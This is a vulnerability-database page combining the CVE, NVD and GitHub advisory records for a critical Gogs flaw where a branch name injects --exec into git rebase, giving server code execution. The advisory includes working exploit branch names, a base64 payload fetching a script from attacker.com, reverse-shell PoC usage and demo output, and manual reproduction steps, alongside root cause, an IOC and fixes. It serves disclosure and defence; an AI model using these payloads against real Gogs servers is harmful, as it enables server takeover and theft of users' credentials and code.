CVE-2026-52806 (GCVE-0-2026-52806)

Vulnerability from cvelistv5 – Published: 2026-06-24 20:21 – Updated: 2026-06-26 03:55

Title

Gogs: RCE via git rebase --exec argument injection in pull request merge

Summary

Gogs is an open source self-hosted Git service. Prior to 0.14.3, Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the --exec flag into the git rebase command during the "Rebase before merging" merge operation. This vulnerability is fixed in 0.14.3.

Severity

9.9 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/gogs/gogs/security/advisories/…	x_refsource_CONFIRM
https://github.com/gogs/gogs/pull/8301	x_refsource_MISC
https://github.com/gogs/gogs/commit/a9dbafbfd8e10…	x_refsource_MISC
https://github.com/gogs/gogs/releases/tag/v0.14.3	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
gogs	gogs	Affected: < 0.14.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-52806",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-25T00:00:00+00:00",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-26T03:55:44.022Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "gogs",
          "vendor": "gogs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.14.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gogs is an open source self-hosted Git service. Prior to 0.14.3, Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the --exec flag into the git rebase command during the \"Rebase before merging\" merge operation. This vulnerability is fixed in 0.14.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-77",
              "description": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-24T20:21:07.650Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9"
        },
        {
          "name": "https://github.com/gogs/gogs/pull/8301",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/pull/8301"
        },
        {
          "name": "https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364"
        },
        {
          "name": "https://github.com/gogs/gogs/releases/tag/v0.14.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
        }
      ],
      "source": {
        "advisory": "GHSA-qf6p-p7ww-cwr9",
        "discovery": "UNKNOWN"
      },
      "title": "Gogs: RCE via git rebase --exec argument injection in pull request merge"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-52806",
    "datePublished": "2026-06-24T20:21:07.650Z",
    "dateReserved": "2026-06-08T18:02:19.731Z",
    "dateUpdated": "2026-06-26T03:55:44.022Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-52806",
      "date": "2026-06-26",
      "epss": "0.01029",
      "percentile": "0.59333"
    },
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-52806\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-25T12:39:25.142734Z\"}}}], \"references\": [{\"url\": \"https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-25T12:39:18.336Z\"}}], \"cna\": {\"title\": \"Gogs: RCE via git rebase --exec argument injection in pull request merge\", \"source\": {\"advisory\": \"GHSA-qf6p-p7ww-cwr9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 9.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"gogs\", \"product\": \"gogs\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.14.3\"}]}], \"references\": [{\"url\": \"https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9\", \"name\": \"https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/gogs/gogs/pull/8301\", \"name\": \"https://github.com/gogs/gogs/pull/8301\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364\", \"name\": \"https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/gogs/gogs/releases/tag/v0.14.3\", \"name\": \"https://github.com/gogs/gogs/releases/tag/v0.14.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Gogs is an open source self-hosted Git service. Prior to 0.14.3, Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the --exec flag into the git rebase command during the \\\"Rebase before merging\\\" merge operation. This vulnerability is fixed in 0.14.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-77\", \"description\": \"CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-24T20:21:07.650Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-52806\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-26T03:55:44.022Z\", \"dateReserved\": \"2026-06-08T18:02:19.731Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-24T20:21:07.650Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-52806

Vulnerability from fkie_nvd - Published: 2026-06-24 21:16 - Updated: 2026-06-26 05:16

Severity

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364
	security-advisories@github.com	https://github.com/gogs/gogs/pull/8301
	security-advisories@github.com	https://github.com/gogs/gogs/releases/tag/v0.14.3
	security-advisories@github.com	https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "gogs",
          "vendor": "gogs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.14.3"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Gogs is an open source self-hosted Git service. Prior to 0.14.3, Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the --exec flag into the git rebase command during the \"Rebase before merging\" merge operation. This vulnerability is fixed in 0.14.3."
    }
  ],
  "id": "CVE-2026-52806",
  "lastModified": "2026-06-26T05:16:29.933",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-52806",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "no"
            },
            {
              "technicalImpact": "total"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-06-25T00:00:00+00:00",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-06-24T21:16:56.440",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/gogs/gogs/pull/8301"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-QF6P-P7WW-CWR9

Vulnerability from github – Published: 2026-06-23 17:02 – Updated: 2026-06-23 17:02

Summary

Gogs vulnerable to RCE via git rebase --exec argument injection in pull request merge

Details

Gogs: RCE via `git rebase --exec` Argument Injection in PR Merge

Summary

Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the --exec flag into the git rebase command during the "Rebase before merging" merge operation.

Severity

Critical - CVSS 3.1 Base Score: 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Affected Versions

Gogs 0.14.2 (latest supported release)
Gogs 0.15.0+dev (commit b53d3162, main branch as of 2026-03-16)
All prior versions that support the "Rebase before merging" merge style

Impact

This is a privilege escalation from authenticated user to server-level code execution. The attacker uses their own repository as the delivery mechanism - the target is not the repository but the Gogs server itself. On any multi-tenant Gogs instance (company, university, open source hosting), this gives one authenticated user full control of the underlying server:

Server compromise: Arbitrary command execution as the Gogs process user
Cross-tenant data breach: Read ALL repositories on the instance, including other users' private repos
Credential theft: Access the database containing password hashes, API tokens, SSH keys, and 2FA secrets for every user
Lateral movement: Pivot to other systems accessible from the server's network
Supply chain attacks: Silently modify any hosted repository's code. The Gogs process user (typically git) has direct filesystem-level read/write access to every repository on the instance under a single REPOSITORY_ROOT directory (default: ~/gogs-repositories). There is no OS-level isolation between repositories; all access control is application-layer only.

The vulnerability affects all supported platforms (Linux, macOS, Windows) and installation methods (pre-built binary, Docker, source). On Docker installations, the Gogs process runs as the git user (UID 1000 by default).

The severity is heightened because:

Open registration by default: Gogs ships with DISABLE_REGISTRATION = false, meaning anyone can create an account on a default-configured instance - effectively making this exploitable by an unauthenticated attacker.
No admin required: Any user who creates a repository is automatically its admin. Enabling rebase is a single toggle in Settings > Advanced - no site-admin intervention, no special permissions, and no interaction with other users required. The attacker creates a repo, enables rebase, and exploits, all within their own account. (Note: PullsAllowRebase defaults to false, but this is irrelevant since any repo creator can enable it themselves.)
The attacker operates entirely within their own repo - no interaction with or access to other users' repos is needed to trigger the exploit
The exploit is fully automatable (see PoC)
The exploit leaves minimal traces (a 500 error in server logs, easily missed)

Prerequisites

The attacker needs one of the following:

Repo admin/owner on any repository (can enable rebase + create PR + merge) - any user who creates a repo has this by default
Write access to a repository where "Rebase before merging" is already enabled by the owner (can create malicious branch + PR + merge)

Note: "Rebase before merging" is NOT enabled by default (PullsAllowRebase defaults to false in internal/database/repo.go:215). However:

Any user who creates their own repository is admin of that repo and can enable rebase via Settings > Advanced
The repo settings endpoint (/settings, action=advanced) requires reqRepoAdmin middleware (internal/cmd/web.go:472) - collaborators with only write access cannot enable it, but repo owners/admins can
Many organizations enable rebase merge as a standard practice

Root Cause Analysis

In internal/database/pull.go, the Merge() function passes the PR's base branch name to git rebase as a positional argument without a -- separator:

if _, stderr, err = process.ExecDir(-1, tmpBasePath,
    fmt.Sprintf("PullRequest.Merge (git rebase): %s", tmpBasePath),
    "git", "rebase", "--quiet", pr.BaseBranch, remoteHeadBranch); err != nil {

The pr.BaseBranch value originates from the URL parameter in internal/route/repo/pull.go:

baseRef := infos[0]  // from strings.Split(c.Params("*"), "...")

Both baseRef and headRef are validated via RevParse (defined in the external git-module library), but this only calls git rev-parse --verify <ref> - it checks that the ref resolves to a valid git object, not that it is safe against argument injection. Since the attacker pushes the malicious branch name to the repository, RevParse succeeds because the ref genuinely exists. The value is stored in the database and later passed as-is to the git rebase command without a -- separator.

Exploitation

Git branch names can legally contain characters $, {, }, =, -. The attacker creates a branch named:

--exec=touch${IFS}/tmp/rce_proof

When used as pr.BaseBranch in the rebase command:

git rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'

Git's argument parser treats --exec=touch${IFS}/tmp/rce_proof as the --exec flag
The --exec flag specifies a command to run via sh -c after each replayed commit
${IFS} expands to a space in the shell, bypassing git's prohibition on spaces in branch names
The command touch /tmp/rce_proof executes as the Gogs server process user

For commands containing characters forbidden in git refs (:, ~, ^, ?, *, [, \, //), such as URLs, the attacker base64-encodes the payload:

--exec=echo${IFS}<base64>|base64${IFS}-d|sh

For example, curl https://attacker.com/shell.sh|sh becomes:

--exec=echo${IFS}Y3VybCBodHRwczovL2F0dGFja2VyLmNvbS9zaGVsbC5zaHxzaA==|base64${IFS}-d|sh

This was validated end-to-end: a wget command with a URL executed inside the Docker container and wrote the fetched HTML to disk.

Full Execution Flow in `Merge()`

The MergeStyleRebase code path in Merge() executes these git commands sequentially:

Step	Command	Result with malicious branch
1	`git clone -b '<malicious>' <repo> <tmp>`	Succeeds - `-b` consumes `--exec=...` as the branch value
2	`git remote add head_repo <repo>` + `git fetch head_repo`	Succeeds normally
3	`git rebase --quiet '<malicious>' 'head_repo/feature'`	RCE fires here - `--exec=<cmd>` parsed as flag, command runs via `sh -c`
4	`git checkout -b <tmpBranch>`	Succeeds (tmpBranch is a server-generated timestamp)
5	`git checkout '<malicious>'`	Fails - git interprets `--exec=...` as invalid option for checkout

Step 5 failure causes Merge() to return an error (HTTP 500), but the RCE has already executed at Step 3. The 500 error is logged but does not prevent exploitation. Defenders can look for this IOC in server logs:

[E] ...merge: git checkout '--exec=<...>': exit status 128 - error: unknown option `exec=<...>'

This is logged via c.Error(err, "merge") at ERROR level.

Why the PR Becomes Mergeable

The testPatch() function (called during PR creation at line 468) calls UpdateLocalCopyBranch(pr.BaseBranch) (internal/database/repo.go:658), which has two code paths:

No local copy exists (first call for a repo): Calls git.Clone() (line 664), which includes --end-of-options → the malicious branch name is treated as data, clone succeeds, and testPatch completes normally.
Local copy already exists (subsequent calls): Calls gitRepo.Checkout(branch) (line 684), which is missing --end-of-options → git interprets --exec=... as a flag → checkout fails → testPatch returns an error.

The exploit relies on the following causal chain:

During PR creation (NewPullRequest, line 468), testPatch() is called. For a fresh repository with no local copy, the Clone path succeeds.
Because testPatch didn't set the status to PullRequestStatusConflict, the status remains PullRequestStatusChecking, and the code at line 472-473 promotes it to PullRequestStatusMergeable.
The background TestPullRequests goroutine (line 840) periodically re-checks PRs. When it calls testPatch again, the local copy now exists, so UpdateLocalCopyBranch takes the Checkout path → fails → returns an error.
This error causes TestPullRequests to skip adding the PR to the update list (return nil at line 855) or skip checkAndUpdateStatus() (continue at line 877). Because checkAndUpdateStatus is never called, the PR status remains at Mergeable indefinitely.

The PoC handles this by creating a fresh repository (no local copy exists yet), ensuring the first testPatch succeeds via the Clone path.

Proof of Concept

A standalone Python exploit (gogs-rebase-rce.py) is attached to this advisory. It automates the full exploit chain (authentication, repo creation, rebase enablement, payload delivery, PR creation, merge trigger, and cleanup) and supports both Linux and Windows targets. Requires Python 3.8+, requests, and a local git installation.

Usage

# Reverse shell (Linux)
python3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 -l <LHOST> -x <LPORT>

# Reverse shell (Windows)
python3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 -l <LHOST> -x <LPORT> --os windows

# Custom command
python3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 -c 'id > /tmp/pwned'

# Version fingerprint only (no exploit)
python3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 --check

Demo

Run the PoC with a reverse shell payload:

python3 gogs-rebase-rce.py -t http://localhost:3080 -u attacker -p Password123 -l 172.17.0.1 -x 1337

[*] Fingerprinting target...
[+] Gogs 0.14.2 detected
[*] Authenticating as "attacker"
[+] Authenticated
[*] Creating repository
[+] Repository xxxx-yyyy created
[*] Enabling rebase merge
[+] Rebase merge enabled
[*] Pushing branches via git
[+] Branches pushed
[*] Creating pull request
[+] PR #1 created
[*] Triggering rebase merge - RCE fires now!
[+] Rebase merge triggered

Checking the listener:

$ nc -nlvp 1337
Listening on 0.0.0.0 1337
Connection received on 172.17.0.2 43240
$ whoami
git

Manual Browser Reproduction

This can be reproduced entirely through the Gogs web UI:

Prerequisites: A running Gogs instance (e.g., http://localhost:3080) with a registered user account.

Step 1: Create a repository and push branches

# Create repo via Gogs API
curl -s -u attacker:Password123 -X POST http://localhost:3080/api/v1/user/repos \
  -H 'Content-Type: application/json' -d '{"name":"demo"}'

# Set up local repo with divergent branches
mkdir /tmp/demo && cd /tmp/demo && git init
git config user.email "attacker@test.com" && git config user.name "attacker"
echo "# Demo" > README.md && git add . && git commit -m "Initial commit"
git checkout -b feature
echo "feature" > feature.txt && git add . && git commit -m "Add feature"
git checkout master
echo "update" >> README.md && git add . && git commit -m "Update master"

# Create the malicious branch (same commit as master)
git update-ref 'refs/heads/--exec=touch${IFS}/tmp/BROWSER_RCE_PROOF' HEAD

# Push all branches
git remote add origin http://attacker:Password123@localhost:3080/attacker/demo.git
git push origin master feature 'refs/heads/--exec=touch${IFS}/tmp/BROWSER_RCE_PROOF:refs/heads/--exec=touch${IFS}/tmp/BROWSER_RCE_PROOF'

Step 2: Enable rebase in repo settings

Navigate to http://localhost:3080/attacker/demo/settings
Click Advanced Settings
Check Enable Pull Requests, then check Allow rebase
Click Save

(Or update the database directly: UPDATE repository SET enable_pulls=1, pulls_allow_rebase=1 WHERE lower_name='demo';)

Step 3: Create the Pull Request

Navigate to the compare URL (base = malicious branch, head = feature):

http://localhost:3080/attacker/demo/compare/%2D%2Dexec%3Dtouch%24%7BIFS%7D%2Ftmp%2FBROWSER_RCE_PROOF...feature

Enter a title (e.g., "RCE PoC") and click New Pull Request.

Step 4: Wait for testPatch (~5 seconds)

The background TestPullRequests goroutine must set the PR to Mergeable. Wait a few seconds, then refresh the PR page. The merge button should appear.

Step 5: Trigger the merge

On the PR page (/attacker/demo/pulls/1), select Rebase before merging
Click Merge Pull Request
The server returns HTTP 500 (expected - git checkout of the malicious branch name fails after rebase)

Step 6: Verify RCE

$ ls -la /tmp/BROWSER_RCE_PROOF
-rw-rw-r-- 1 cryptocat cryptocat 0 Mar 16 18:02 /tmp/BROWSER_RCE_PROOF

The file was created by the Gogs server process during git rebase --exec

Recommended Fix

Primary fix: Add `--` separator

// internal/database/pull.go line 282
"git", "rebase", "--quiet", "--", pr.BaseBranch, remoteHeadBranch

Defense-in-depth: Validate branch names

Reject base branch names starting with - at the PR creation endpoint:

// internal/route/repo/pull.go, after line 447
if strings.HasPrefix(baseRef, "-") {
    c.NotFound()
    return nil, nil, nil, nil, "", ""
}

Additional hardening

Apply -- separators to all other process.ExecDir calls in Merge() that use pr.BaseBranch:

Line 233: git clone -b pr.BaseBranch (not directly exploitable but should be hardened)
Line 297: git checkout pr.BaseBranch (currently fails, but should use -- pr.BaseBranch)
Line 315: git push <repo> pr.BaseBranch (should use -- separator)

Relationship to Prior Argument Injection Fixes

This vulnerability is an incomplete fix bypass of the Category A argument injection invariant that Gogs has been patching across multiple advisories:

Advisory	CVE	Description	Fix Applied
GHSA-m27m-h5gj-wwmg	CVE-2024-39933	Argument injection when tagging new releases	Added `--` separator to `git tag`
GHSA-9pp6-wq8c-3w2c	CVE-2024-39932	Argument injection during changes preview	Added `--end-of-options` to `git diff`
GHSA-v9vm-r24h-6rqm	CVE-2026-26194	Release tag option injection in deletion	Migrated to safe git-module API
GHSA-vm62-9jw3-c8w3	CVE-2024-39930	Argument injection in built-in SSH server	Added `--` separator to `git upload-pack` / `git receive-pack`

The git-module library (v1.8.7) was hardened with --end-of-options in Clone(), Push(), Fetch(), and 28 other call sites. However, the Merge() function in internal/database/pull.go bypasses all of these protections because it uses raw process.ExecDir (which wraps exec.Command directly) instead of the safe git-module API. The git rebase call was never migrated.

Notably, git-module.Checkout() is also missing --end-of-options — a separate gap that incidentally causes the testPatch race condition this exploit leverages (see "Why the PR Becomes Mergeable" above).

Affected Platforms

The vulnerability has been confirmed on:

Linux: Docker (official image) and binary installation on Ubuntu 24.04
Windows: Binary installation with Git for Windows (MSYS2)

On Windows, the base64 inline payload approach fails because NTFS forbids the | character in filenames (git stores refs as files). The exploit uses file-based payload delivery instead: the payload is committed as a script file, and the branch name becomes --exec=sh${IFS}<filename>. An sh wrapper invokes cmd.exe //c <payload>.bat to avoid MSYS2 shell metacharacter mangling. The attached PoC handles this automatically.

Test Environment

OS: Ubuntu Linux 24.04, Windows (Git for Windows)
Gogs version: 0.14.2 (also confirmed on 0.15.0+dev, commit b53d3162)
Go version: go1.26.1
Database: SQLite
Deployment: Docker (official image), binary, and built from source

Credit

Jonah Burgess (CryptoCat) - Senior Security Researcher @Rapid7

Severity

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-52806"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-23T17:02:40Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "# Gogs: RCE via `git rebase --exec` Argument Injection in PR Merge\n\n## Summary\n\nGogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the `--exec` flag into the `git rebase` command during the \"Rebase before merging\" merge operation.\n\n## Severity\n\n**Critical** - CVSS 3.1 Base Score: 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Versions\n\n- **Gogs 0.14.2** (latest supported release)\n- Gogs 0.15.0+dev (commit `b53d3162`, main branch as of 2026-03-16)\n- All prior versions that support the \"Rebase before merging\" merge style\n\n## Impact\n\nThis is a **privilege escalation from authenticated user to server-level code execution**. The attacker uses their own repository as the delivery mechanism - the target is not the repository but the Gogs server itself. On any multi-tenant Gogs instance (company, university, open source hosting), this gives one authenticated user full control of the underlying server:\n\n- **Server compromise**: Arbitrary command execution as the Gogs process user\n- **Cross-tenant data breach**: Read ALL repositories on the instance, including other users\u0027 private repos\n- **Credential theft**: Access the database containing password hashes, API tokens, SSH keys, and 2FA secrets for every user\n- **Lateral movement**: Pivot to other systems accessible from the server\u0027s network\n- **Supply chain attacks**: Silently modify any hosted repository\u0027s code. The Gogs process user (typically `git`) has direct filesystem-level read/write access to every repository on the instance under a single `REPOSITORY_ROOT` directory (default: `~/gogs-repositories`). There is no OS-level isolation between repositories; all access control is application-layer only.\n\nThe vulnerability affects all supported platforms (Linux, macOS, Windows) and installation methods (pre-built binary, Docker, source). On Docker installations, the Gogs process runs as the `git` user (UID 1000 by default).\n\nThe severity is heightened because:\n\n- **Open registration by default**: Gogs ships with `DISABLE_REGISTRATION = false`, meaning anyone can create an account on a default-configured instance - effectively making this exploitable by an unauthenticated attacker.\n- **No admin required**: Any user who creates a repository is automatically its admin. Enabling rebase is a single toggle in Settings \u003e Advanced - no site-admin intervention, no special permissions, and no interaction with other users required. The attacker creates a repo, enables rebase, and exploits, all within their own account. (Note: `PullsAllowRebase` defaults to `false`, but this is irrelevant since any repo creator can enable it themselves.)\n- The attacker operates entirely within their own repo - no interaction with or access to other users\u0027 repos is needed to trigger the exploit\n- The exploit is fully automatable (see PoC)\n- The exploit leaves minimal traces (a 500 error in server logs, easily missed)\n\n## Prerequisites\n\nThe attacker needs **one** of the following:\n\n- **Repo admin/owner** on any repository (can enable rebase + create PR + merge) - **any user who creates a repo has this by default**\n- **Write access** to a repository where \"Rebase before merging\" is already enabled by the owner (can create malicious branch + PR + merge)\n\nNote: \"Rebase before merging\" is NOT enabled by default (`PullsAllowRebase` defaults to `false` in `internal/database/repo.go:215`). However:\n\n- Any user who creates their own repository is admin of that repo and can enable rebase via Settings \u003e Advanced\n- The repo settings endpoint (`/settings`, action=`advanced`) requires `reqRepoAdmin` middleware (`internal/cmd/web.go:472`) - collaborators with only write access cannot enable it, but repo owners/admins can\n- Many organizations enable rebase merge as a standard practice\n\n## Root Cause Analysis\n\nIn `internal/database/pull.go`, the [`Merge()` function](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282) passes the PR\u0027s base branch name to `git rebase` as a positional argument without a `--` separator:\n\n```go\nif _, stderr, err = process.ExecDir(-1, tmpBasePath,\n    fmt.Sprintf(\"PullRequest.Merge (git rebase): %s\", tmpBasePath),\n    \"git\", \"rebase\", \"--quiet\", pr.BaseBranch, remoteHeadBranch); err != nil {\n```\n\nThe `pr.BaseBranch` value originates from the [URL parameter](https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L447) in `internal/route/repo/pull.go`:\n\n```go\nbaseRef := infos[0]  // from strings.Split(c.Params(\"*\"), \"...\")\n```\n\nBoth `baseRef` and `headRef` are validated via [`RevParse`](https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L482) (defined in the external [`git-module`](https://github.com/gogs/git-module) library), but this only calls `git rev-parse --verify \u003cref\u003e` - it checks that the ref resolves to a valid git object, not that it is safe against argument injection. Since the attacker pushes the malicious branch name to the repository, `RevParse` succeeds because the ref genuinely exists. The value is stored in the database and later passed as-is to the `git rebase` command without a `--` separator.\n\n## Exploitation\n\nGit branch names can legally contain characters `$`, `{`, `}`, `=`, `-`. The attacker creates a branch named:\n\n```bash\n--exec=touch${IFS}/tmp/rce_proof\n```\n\nWhen used as `pr.BaseBranch` in the rebase command:\n\n```bash\ngit rebase --quiet \u0027--exec=touch${IFS}/tmp/rce_proof\u0027 \u0027head_repo/feature\u0027\n```\n\n1. 